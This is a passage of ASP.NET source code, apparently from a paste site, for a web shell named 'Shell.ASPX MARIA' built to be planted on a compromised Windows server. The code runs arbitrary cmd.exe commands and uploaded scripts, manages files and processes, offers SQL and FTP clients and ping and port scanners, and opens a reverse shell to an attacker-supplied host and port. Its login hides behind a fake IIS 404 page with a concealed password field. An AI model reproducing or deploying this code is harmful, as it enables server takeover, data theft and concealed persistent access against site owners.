- SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=yes seamless=yes src=TEMP~.aspx?&host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>" + e.Message + "</div>");
- }
- }
- }
- // List Diretories and Files
- DirectoryInfo di = new DirectoryInfo(CurrentFolder);
- String lastdirectory = Path.GetFullPath(Path.Combine(CurrentFolder, @"..\"));
- Folders += string.Format("<tr><td><center><b>BACK DIRECTORY</b></center></a></td><td><a href='?Directory={0}'>..</a></td><td>Directory</td><td></td><td></td><td></td></tr>", lastdirectory);
- foreach (DirectoryInfo curdir in di.GetDirectories())
- {
- string fstr = string.Format("<a href='?Directory={0}'>{1}</a>", HttpUtility.UrlEncode(CurrentFolder + "/" + curdir.Name), HttpUtility.HtmlEncode(curdir.Name));
- Folders += string.Format("<tr><td><center><b><a href=?DeleteDir="+HttpUtility.UrlEncode(CurrentFolder+ "/" + curdir.Name)+">[X]</b></center></a></td><td>{0}</td><td>Directory</td><td></td><td></td><td></td></tr>", fstr);
- //attributesOfFolder="";
- }
- foreach (FileInfo curfile in di.GetFiles())
- {
- FileAttributes attributes = File.GetAttributes(@curfile.FullName);
- if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden) {attributesOfFiles+="<a title='Hidden'>H</a>";}
- if ((attributes & FileAttributes.ReadOnly) == FileAttributes.ReadOnly) {attributesOfFiles+="<a title='Read'>R</a>";}else{attributesOfFiles+="<a title='Read'>R</a><a title='Write'>W</a>";}
- string fstr = string.Format("<a href='?View={0}' target='_blank'>{1}</a>", HttpUtility.UrlEncode(CurrentFolder + "/" + curfile.Name), HttpUtility.HtmlEncode(curfile.Name));
- string astr = string.Format("<b><i><center><a href='javascript:deletefile(\"{1}\")' title='Delete'>[X]</a> <a href='?Directory={0}&get={1}' title='Edict'>[E]</a> <a href='?Directory={0}&Download={1}' title='Download'>[D]</a> <a href='javascript:PopupBoxRenameFile(\"{0}\",\"{1}\");' title='Rename'>[R]</a></center></b></i>", HttpUtility.UrlEncode(CurrentFolder), HttpUtility.UrlEncode(CurrentFolder + "/" + curfile.Name));
- string Extension=HttpUtility.UrlEncode(curfile.Extension);
- Files += string.Format("<tr><td>{2}</td><td>{0}</td><td>{3} File</td><td>"+attributesOfFiles+"</td><td>"+curfile.CreationTime+"</td><td>{1:d} Kb</td></tr>", fstr, curfile.Length, astr, Extension);
- attributesOfFiles="";
- }
- // Console CMD
- if (txtCmdIn.Text.Length > 0)
- {
- Process p = new Process();
- p.StartInfo.CreateNoWindow = true;
- p.StartInfo.FileName = "cmd.exe";
- p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
- p.StartInfo.UseShellExecute = false;
- p.StartInfo.RedirectStandardOutput = true;
- p.StartInfo.RedirectStandardError = true;
- p.StartInfo.WorkingDirectory = CurrentFolder;
- p.Start();
- lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
- txtCmdIn.Text = "";
- }
- // Searcher
- if(!string.IsNullOrEmpty(Request.Form["Searcher"])){
- string startFolder = @CurrentFolder;
- ResultSearchOuput+="<script>DivShowAndHidden('Searcher');</script>";
- System.IO.DirectoryInfo dir = new System.IO.DirectoryInfo(startFolder);
- try{
- if(!string.IsNullOrEmpty(Request.Form["QueryExtentionSearch"])){foreach (System.IO.FileInfo file in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)){if(file.Extension == Request.Form["QueryExtentionSearch"]){ResultSearchOuput+="<br> Namefile : <b>"+file.FullName+"</b> Creation Time: <b><font color='green'>"+file.CreationTime+"</b></font>";}}}
- if(!string.IsNullOrEmpty(Request.Form["QueryNameSearch"])){foreach (System.IO.FileInfo file in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)){if(file.Name == Request.Form["QueryNameSearch"]){ResultSearchOuput+="<br> Namefile : <b>"+file.FullName+"</b> Creation Time: <b><font color='green'>"+file.CreationTime+"</b></font>";}}}
- if(!string.IsNullOrEmpty(Request.Form["QueryStringSearch"])){
- foreach (System.IO.FileInfo fi in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)) {
- int counte=0;
- string line; System.IO.StreamReader filetoRead = new System.IO.StreamReader(fi.FullName);
- String Patron=Request.Form["QueryStringSearch"];
- Regex regex = new Regex(Patron, RegexOptions.IgnoreCase | RegexOptions.IgnorePatternWhitespace);
- while((line = filetoRead.ReadLine()) != null) {counte+=1;if (regex.Match(line).Success == true){ResultSearchOuput+="<br> Namefile : <b>"+fi.FullName+"</b> Creation Time: <b><font color='green'>"+fi.CreationTime+"</font> Line: "+counte+"</b>";}}filetoRead.Close();}}
- }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
- if (ResultSearchOuput.Length == 67){ResultSearchOuput="<script>DivShowAndHidden('Searcher');</script><div class='alert'>SHELL.ASPX Message: No Match </div>";}
- }
- // Getting Information Server
- String NameMachine=Environment.MachineName.ToString();
- String VersionOS=Environment.OSVersion.ToString();
- String ProcessorCountMachine=Environment.ProcessorCount.ToString();
- String UserNameMachine=Environment.UserName.ToString();
- // Detected Lenguages Installed on system
- if (File.Exists(MainDrive+@"python27\python.exe")){Binaries+="<b><font color=green>Python 2.7</font></b> ";}
- if (File.Exists(MainDrive+@"python32\python.exe")){Binaries+="<b><font color=green>Python 3.2</font></b> ";}
- if (File.Exists(MainDrive+@"perl\bin\perl.exe")){Binaries+="<b><font color=blue>Perl</font></b> ";}
- if (File.Exists(MainDrive+@"ruby\ruby.exe")){Binaries+="<b><font color=red>Ruby</font></b> ";}
- if (File.Exists(MainDrive+@"ProgramData\Oracle\Java\javapath\java.exe")){Binaries+="<b><font color=coral>Java</font></b> ";}
- if (Binaries == ""){Binaries="No Binaries Detected...";}
- // Run Scripts
- if(!string.IsNullOrEmpty(Request.Form["language"])){
- String ExtensionFile="";String BinLAN="";
- if(Request.Form["language"] == "batch"){ExtensionFile=".cmd";BinLAN="cmd.exe";}
- if(Request.Form["language"] == "vbs"){ExtensionFile=".vbs";BinLAN="cscript ";}
- using (System.IO.File.Create(@CurrentFolder+"scriptToRun"+ExtensionFile));
- System.IO.File.WriteAllText(@CurrentFolder+"scriptToRun"+ExtensionFile, Request.Form["content"]);
- Process p = new Process();
- p.StartInfo.CreateNoWindow = true;
- p.StartInfo.FileName = BinLAN;
- if(BinLAN=="cmd.exe"){p.StartInfo.Arguments = "/c "+@CurrentFolder+"scriptToRun"+ExtensionFile;}
- else{p.StartInfo.Arguments = @CurrentFolder+"scriptToRun"+ExtensionFile;}
- p.StartInfo.UseShellExecute = false;
- p.StartInfo.RedirectStandardOutput = true;
- p.StartInfo.RedirectStandardError = true;
- p.StartInfo.WorkingDirectory = CurrentFolder;
- p.Start();
- lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
- txtCmdIn.Text = "";
- File.Delete(@CurrentFolder+"scriptToRun"+ExtensionFile);
- }
- // Process Magnament
- System.Text.StringBuilder sb = new StringBuilder();
- System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcesses();
- String VTTable="";
- foreach (System.Diagnostics.Process process in processes)
- {
- if(Request.QueryString["action"] != null){
- if(Request.QueryString["process"] == process.ProcessName){
- try{
- process.Kill();
- Response.Write("<div class='alert'>SHELL.ASPX Message: Process Killed</div>");
- }catch (Exception e){
- Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");
- }}}
- VTTable += string.Format("<tr><td><center><a href='?process={0}&action=kill' title='kill process'>[Kill]</a></td><td>{0}</td><td>{1}</td></tr>",process.ProcessName,process.WorkingSet64 / 1000);
- //Response.Write(VTTable);
- }
- // Shell Reverse
- if (!string.IsNullOrEmpty(Request.Form["a"]))
- {
- try
- {
- start P = new start();
- String Hostname = Request.Form["u"];
- String PortListening = Request.Form["p"];
- Response.Write("<script>alert('SHELL.ASPX: Connecting with Host Remote ["+Hostname+":"+PortListening+"]')</script>");
- P.StartShell(Hostname, PortListening);
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>SHELL.ASPX Message: " + e.Message + "</div>");
- }
- }
- // Intrutions General
- try{
- // Rename File
- if (!string.IsNullOrEmpty(Request.QueryString["Rename"])){File.Copy(Request.QueryString["file"],@CurrentFolder+Request.QueryString["Rename"]);File.Delete(Request.QueryString["file"]);Response.Redirect (MARIA);}
- // Download File
- if (!string.IsNullOrEmpty(Request.QueryString["Download"])){Response.Clear();Response.ContentType = "application/octet-stream";Response.AddHeader("Content-Disposition", "attachment; filename="+Request.QueryString["Download"]);Response.WriteFile(Request.QueryString["Download"]);Response.Flush();Response.End();}
- // Edictor
- if (!string.IsNullOrEmpty(Request.QueryString["get"])){Response.Write(" <title>Shell.ASPX MARIA - Editor</title><div style='font-size: 20px; background-color: red; color: #FFFFFF; text-align: left;'>Shell.APSX MARIA - Editor</h1><form method='POST' action='?Run'> <textarea name='content' style='height: 100%; width: 100%;'>");Response.WriteFile(Request.QueryString["get"]);Response.Write(" </textarea><input type='hidden' name='GetEdict' value='true'><input type='hidden' name='FileName' value='"+Request.QueryString["get"]+"'><input type='submit' value='Save'>");Response.End();}
- // File to Edict
- if(!string.IsNullOrEmpty(Request.Form["GetEdict"])){File.Delete(Request.Form["FileName"]);try{String FileToEdict = Request.Form["FileName"];FileToEdict = FileToEdict.Replace("//","\\").Replace("/","\\");using (System.IO.File.Create(@FileToEdict));System.IO.File.WriteAllText(@FileToEdict, Request.Form["content"]);Response.Write("<div class='alert'>SHELL.ASPX Message: File Edicted</div>");}catch (Exception e) {Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}}
- // Delete File
- if (!string.IsNullOrEmpty(Request.QueryString["Delete"])){File.Delete(Request.QueryString["Delete"]);Response.Redirect (MARIA);}
- // View File
- if (!string.IsNullOrEmpty(Request.QueryString["View"])){Response.Write("<title>Shell.ASPX MARIA - View</title><div style='font-size: 20px; background-color: red; color: #FFFFFF; text-align: left;'>Shell.APSX MARIA - View</h1> <textarea name='content' style='height: 100%; width: 100%;'>");Response.WriteFile(Request.QueryString["View"]);Response.Write(" </textarea>");Response.End();}
- // Delete Folder
- if (!string.IsNullOrEmpty(Request.QueryString["DeleteDir"])){System.IO.Directory.Delete(Request.QueryString["DeleteDir"]);Response.Redirect (MARIA);}
- // Make New Folder
- if (!string.IsNullOrEmpty(Request.QueryString["NewFolder"])){System.IO.Directory.CreateDirectory(@CurrentFolder+Request.QueryString["NewFolder"]);Response.Redirect (MARIA);}
- // Make New File
- if (!string.IsNullOrEmpty(Request.QueryString["NewFile"])){using (System.IO.File.Create(@CurrentFolder+Request.QueryString["NewFile"]));Response.Redirect (MARIA); }
- // Upload File
- if(flUp.HasFile)
- {
- string fileName = flUp.FileName;
- int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
- if (splitAt >= 0)
- fileName = flUp.FileName.Substring(splitAt);
- flUp.SaveAs(CurrentFolder + "/" + fileName);
- Response.Redirect (MARIA);
- }
- }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
- %>
- <script runat="server">
- public class start
- {
- TcpClient tcpClient;
- NetworkStream networkStream;
- StreamWriter streamWriter;
- StreamReader streamReader;
- Process processCmd;
- StringBuilder strInput;
- public void StartShell(string IPR, string PORR)
- {
- tcpClient = new TcpClient();
- strInput = new StringBuilder();
- try
- {
- int PORT = Convert.ToInt32(PORR);
- tcpClient.Connect(IPR, PORT);
- networkStream = tcpClient.GetStream();
- streamReader = new StreamReader(networkStream);
- streamWriter = new StreamWriter(networkStream);
- }
- catch (Exception err) { return; }
- processCmd = new Process();
- processCmd.StartInfo.FileName = "cmd.exe";
- processCmd.StartInfo.CreateNoWindow = true;
- processCmd.StartInfo.UseShellExecute = false;
- processCmd.StartInfo.RedirectStandardOutput = true;
- processCmd.StartInfo.RedirectStandardInput = true;
- processCmd.StartInfo.RedirectStandardError = true;
- processCmd.OutputDataReceived += new
- DataReceivedEventHandler(CmdOutputDataHandler);
- processCmd.Start();
- processCmd.BeginOutputReadLine();
- while (true)
- {
- try
- {
- strInput.Append(streamReader.ReadLine());
- strInput.Append("\n");
- if(strInput.ToString().LastIndexOf(
- "terminate") >= 0) StopServer();
- if(strInput.ToString().LastIndexOf(
- "exit") >= 0) throw new ArgumentException();
- processCmd.StandardInput.WriteLine(strInput);
- strInput.Remove(0, strInput.Length);
- }
- catch (Exception err)
- {
- Cleanup();
- break;
- }
- }
- }
- private void Cleanup()
- {
- try { processCmd.Kill(); } catch (Exception err) { };
- streamReader.Close();
- streamWriter.Close();
- networkStream.Close();
- }
- private void StopServer()
- {
- Cleanup();
- System.Environment.Exit(System.Environment.ExitCode);
- }
- private void CmdOutputDataHandler(object sendingProcess,
- DataReceivedEventArgs outLine)
- {
- StringBuilder strOutput = new StringBuilder();
- if(!String.IsNullOrEmpty(outLine.Data))
- {
- try
- {
- strOutput.Append(outLine.Data);
- streamWriter.WriteLine(strOutput);
- streamWriter.Flush();
- }
- catch (Exception err) { }
- }
- }
- }//end class Form
- </script>
- <!-- Shell MARIA / GUI -->
- <%
- // Login Security Shell
- String REQCOOKIE = "NOACCESS";
- if (Request.Cookies["UserSettings"] != null)
- {
- HttpCookie COOK = Request.Cookies.Get("UserSettings");
- if (COOK.Value == "Error="+PASSWORG_SHELL)
- {
- REQCOOKIE = "GRANTED";
- }
- }
- else
- {
- if (Request.Form["error"] == PASSWORG_SHELL)
- {
- HttpCookie myCookie = new HttpCookie("UserSettings");
- myCookie["Error"] = PASSWORG_SHELL;
- myCookie.Expires = DateTime.Now.AddDays(1d);
- Response.Cookies.Add(myCookie);
- REQCOOKIE = "GRANTED";
- }
- }
- if (REQCOOKIE == "NOACCESS")
- {
- String SERVERERROR = @"
- <html>
- <head>
- <meta http-equiv=Content-Type content='text/html; charset=iso-8859-1'/>
- <title>404 - File or directory not found.</title>
- <style type=text/css>
- <!--
- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
- fieldset{padding:0 15px 10px 15px;}
- h1{font-size:2.4em;margin:0;color:#FFF;}
- h2{font-size:1.7em;margin:0;color:#CC0000;}
- h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
- #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:'trebuchet MS', Verdana, sans-serif;color:#FFF;
- background-color:#555555;}
- #content{margin:0 0 0 2%;position:relative;}
- .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
- -->
- </style>
- </head>
- <body>
- <div id=header><h1>Server Error</h1></div>
- <div id=content>
- <div class=content-container><fieldset>
- <h2>404 - File or directory not found.<form method=post><input style='border: 0px;cursor: default;padding: inherit;' type=password name=error></form></h2>
- <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
- </fieldset></div>
- </div>
- </body>
- </html>";
- Response.Write(SERVERERROR);
- }else{
- %>
- <html>
- <head>
- <title>SHELL</title>
- </head>
- <body>
- <style type="text/css">
- * {font-family: Arial; font-size: 12px;}
- body {margin: 0px; background-color: white}
- pre {font-family: Courier New; background-color: black; margin: 60px;}
- .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;}
- .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;}
- .boxer {font-size: 15px; text-align: left;}
- .tabla {width: 100%; border: 3px solid #000;overflow-x:auto}
- .footTable {width: 100%; border: 3px solid #000;overflow-x:auto}
- .cmdPromp {background-color: black; color: white;border: 3px solid #000;}
- h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
- th {text-align: left; background-color: black; color: white}
- td {background-color: #d7d7d7;}
- a:link {background-color: #d7d7d7; color: black}
- a:visited {background-color: #d7d7d7;}
- a:hover {background-color: red;}
- a:active {background-color: #d7d7d7;}
- #footer {width: 100%;height:81px;position:relative;bottom: 0;left: 0;}
- </style>
- <script language="JavaScript" type="text/javascript">
- <!--
- var ShellPROMPT = " SHELL.ASPX Message: \n";
- function Zanizar(value) { value = value.replace(/\/\//g, "\\"); value = value.replace(/\//g, "\\"); return value }
- function PopupBoxRenameFile(folder, file) { var string = prompt(ShellPROMPT + "Type the New Name for " + file + " file."); if (string != null) { folder = Zanizar(folder); file = Zanizar(file); window.location = "?file=" + file + "&Rename=" + string; } }
- function makeFolder() { var string = prompt(ShellPROMPT + "Type the New folder Name."); if (string != null) { alert(string); window.location = "?NewFolder=" + string; } }
- function makeFile() { var string = prompt(ShellPROMPT + "Type the New File Name."); if (string != null) { alert(string); window.location = "?NewFile=" + string; } }
- function DivShowAndHidden(DivName) { var e = document.getElementById(DivName); e.style.display = (e.style.display == 'block') ? 'none' : 'block'; }
- function GetFileDB(a) { var x = (a.value || a.options[a.selectedIndex].value); if (x == "SQLite") { DivShowAndHidden('FileNAMESQLite'); } }
- function GoFolder(folder){window.location = "?Directory="+folder; }
- function deletefile(file){if (confirm("Delete file : "+file+" ?") == true) {window.location = "?Delete="+file; } else {alert("Coward"); } }
- function Reloj() {
- if (!document.layers && !document.all && !document.getElementById)
- return
- var Digital = new Date()
- var hours = Digital.getHours()
- var minutes = Digital.getMinutes()
- var seconds = Digital.getSeconds()
- var d = new Date();
- var dn = "PM"
- if (hours < 12) { dn = "AM" } if (hours > 12) { hours = hours - 12 } if (hours == 0) { hours = 12 } if (minutes <= 9) { minutes = "0" + minutes } if (seconds <= 9) { seconds = "0" + seconds }
- myclock = hours + ":" + minutes + ":" + seconds + " " + dn + " % " + d.getDate() + "/" + (d.getMonth() + 1) + "/" + d.getFullYear() + " ID:<%= NameMachine +"<br> OS:"+ VersionOS %>"
- if (document.layers) { document.layers.liveclock.document.write(myclock); document.layers.liveclock.document.close() }
- else if (document.all) { liveclock.innerHTML = myclock }
- else if (document.getElementById) { document.getElementById("liveclock").innerHTML = myclock; setTimeout("Reloj()", 1000) }
- }
- window.onload = Reloj
- //-->
- </script>
- <div class="timer">Shell.ASPX MARIA<span style="position:absolute;left:80%;" id="liveclock"></div>
- <table class="tabla">
- <tr>
- <th scope="col">Commands</th>
- <th scope="col">Name</th>
- <th scope="col">Type</th>
- <th scope="col">Attributes</th>
- <th scope="col">Data Creation</th>
- <th scope="col">Size</th>
- </tr>
- <div class="footTable"><div class="boxer"> <a href="<%= MARIA %>"><input type="button" id="Dirs" value="Home"></a> Storages <%= Output %> Directory Current: <input type="text" id="CurrentFolder" style="width: 68%;" value="<%= CurrentFolder %>"> <input type="button" value="Go" onclick="GoFolder(document.getElementById('CurrentFolder').value)"> <input type="button" value="Make Folder" onclick="makeFolder()"><input type="button" onclick=" makeFile()" value="Make File"></div></div>
- <div class="Liste"> <%= Folders %> <%= Files %>
- <form id="form1" runat="server">
- <div class="footTable"> <b> Console</b> <asp:TextBox runat="server" ID="txtCmdIn" Width="88%" /><asp:Button runat="server" ID="cmdExec" Text="Execute" /></div><div class="cmdPromp">
- <pre>
- <h1>CMD::CONSOLE</h1>
- <asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre></div>
- </table><div class="footTable">Upload Files :
- <asp:FileUpload runat="server" ID="flUp" />
- <asp:Button runat="server" ID="cmdUpload" Text="Upload" /></div>
- </form>
- <div class="footTable">Binaries detected: <%= Binaries %> </div>
- <div class="footTable"><center> <center style="background-color: black; color: white; font-family: inherit; font-language-override: inherit; font-style: italic;"> <input type="button" onclick="javascript: DivShowAndHidden('CONSOLE')" value="Scripting"> % <input type="button" onclick=" javascript: DivShowAndHidden('SQLConnection')" value="SQL Client"> % <input type="button" onclick=" javascript: DivShowAndHidden('Tasklist')" value="Process"> % <input type="button" onclick=" javascript: DivShowAndHidden('Searcher')" value="Searcher"> % <input type="button" onclick=" javascript: DivShowAndHidden('FTP')" value="FTP Client"> % <input type="button" onclick="javascript: DivShowAndHidden('SRV')" value="Shell-Reverse"/> % <input type="button" onclick="javascript: DivShowAndHidden('PSCAN')" value="Ping-Scan" /> % <input type="button" onclick="javascript: DivShowAndHidden('PORTSCAN')" value="Port-Scan" /></</b></center>
- <div id="CONSOLE" style="display:none;"><br> Script Type:
- <form method="POST">
- <select name="language">
- <option value="batch">Batch</option>
- <option value="vbs">VBS</option>
- </select><input type="submit" value="Run."> <br>
- <textarea name="content" style='height: 100%; width: 100%;'>
- </textarea>
- </form>
- </div></div>
- <div id="Tasklist" style="display:none;">
- <table class="tabla">
- <tr>
- <th scope="col">Commands</th>
- <th scope="col">Name</th>
- <th scope="col">PID</th>
- </tr>
- <%= VTTable %>
- </table>
- </div>
- <div id="PSCAN" style="display:none;">
- <div class="footTable">
- <form id="PSCANForm" method="POST"><br>
- <center>
- Range.......... <input type="text" name="Range" value="127.0.0.%">
- Timeout........ <input type="text" name="Timeout" value="3000">(s)<br>
- <input type="submit" value="Scan"><br>
- <%= PINGSCAN %>
- </form></center>
- </div></div>
- <div id="PORTSCAN" style="display:none;">
- <div class="footTable">
- <form id="PORTSCANForm" method="POST"><br>
- <center>
- IP.......... <input type="text" name="IPSCAN" value="<%= Request.Form["IPSCAN"] %>">
- Ports....... <input type="text" name="Ports" value="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500,22,443,8080,8081,8082,8083,8443,1099,9090,9091,9092,9093,9094,9443,7001">(s)<br>
- <input type="submit" value="Scan"><br>
- <%= PORTSCAN %>
- </form></center>
- </div></div>
- <div id="Searcher" style="display:none;">
- <div class="footTable"><br><center>
- <form id="Form2" method="POST">
- <input type="hidden" name="Searcher" value="true">
- Name.......... <input type="text" name="QueryNameSearch" value=""><br>
- Extension... <input type="text" name="QueryExtentionSearch" value=""><br>
- Content....... <input type="text" name="QueryStringSearch" value=""><br>
- <br><input type="submit" value="I'm gonna get lucky?..."><br>
- <%= ResultSearchOuput %>
- </p></form>
- </center><br>
- </div></div>
- <div id="SQLConnection" style="display:none;">
- <div class="footTable"><br><center>
- <form id="SQLForm" method="POST">SQL Type:
- <select onchange="GetFileDB(this)" name="SQLProtocol">
- <option value="SQLServer">SQLServer</option>
- <option value="SQLite">SQLite</option>
- <option value="PostgreSQL">PostgreSQL</option>
- <option value="MySQL">Mysql</option>
- </select>
- Host:<input type="text" name="host" value="<%= Request.Form["host"] + Request.QueryString["host"]%>">
- Port:<input type="text" name="port" value="<%= Request.Form["port"] + Request.QueryString["port"]%>">
- Username:<input type="text" name="user" value="<%= Request.Form["user"] + Request.QueryString["user"]%>">
- Password:<input type="text" name="pass" value="<%= Request.Form["pass"] + Request.QueryString["pass"]%>">
- Database:<input type="text" name="database" value="<%= Request.Form["database"] + Request.QueryString["database"]%>">
- <div id="FileNAMESQLite" style="display:none;">
- <br>SQLite Connection<br><br>
- DB File:<input type="text" name="filename" placeholder="C:/USER/RED/TEST.SQLITE" value="<%= Request.Form["filename"] + Request.QueryString["filename"]%>">
- Version: <select name="VersionSQLite">
- <option value=1>1.0</option>
- <option value=3>3.0</option>
- </select>
- </div>
- <input type="submit" value="Connect">
- </form></center>
- <%= SQLView %>
- </div></div>
- <div id="FTP" style="display:none;">
- <div class="footTable"><br><center>
- <form id="Form3" method="POST">
- Host:<input type="text" name="host" value="<%= Request.Form["host"] %>">
- Username:<input type="text" name="user" value="<%= Request.Form["user"] %>">
- Password:<input type="text" name="pass" value="<%= Request.Form["pass"] %>">
- SSL:<input type="checkbox" name="database" value="">
- <input type="hidden" name="FTP" value="true">
- <input type="hidden" name="command" value="">
- <input type="submit" value="Connect">
- </form></center>
- <%= OutputFTPBuffer + OutputFTPStatus %>
- </div></div>
- <div id="SRV" style="display:none;">
- <div class="footTable"><br><center>
- <form id="Form5" method="POST">
- Host:<input type="text" name="host" value="<%= Request.Form["host"] %>">
- Port:<input type="text" name="port" value="<%= Request.Form["port"] %>">
- <input type="hidden" name="a" value="Shell">
- <input type="submit" value="Connect">
- </form></center></div></div>
- </html>
- <% } %>
Add Comment
Please, Sign In to add comment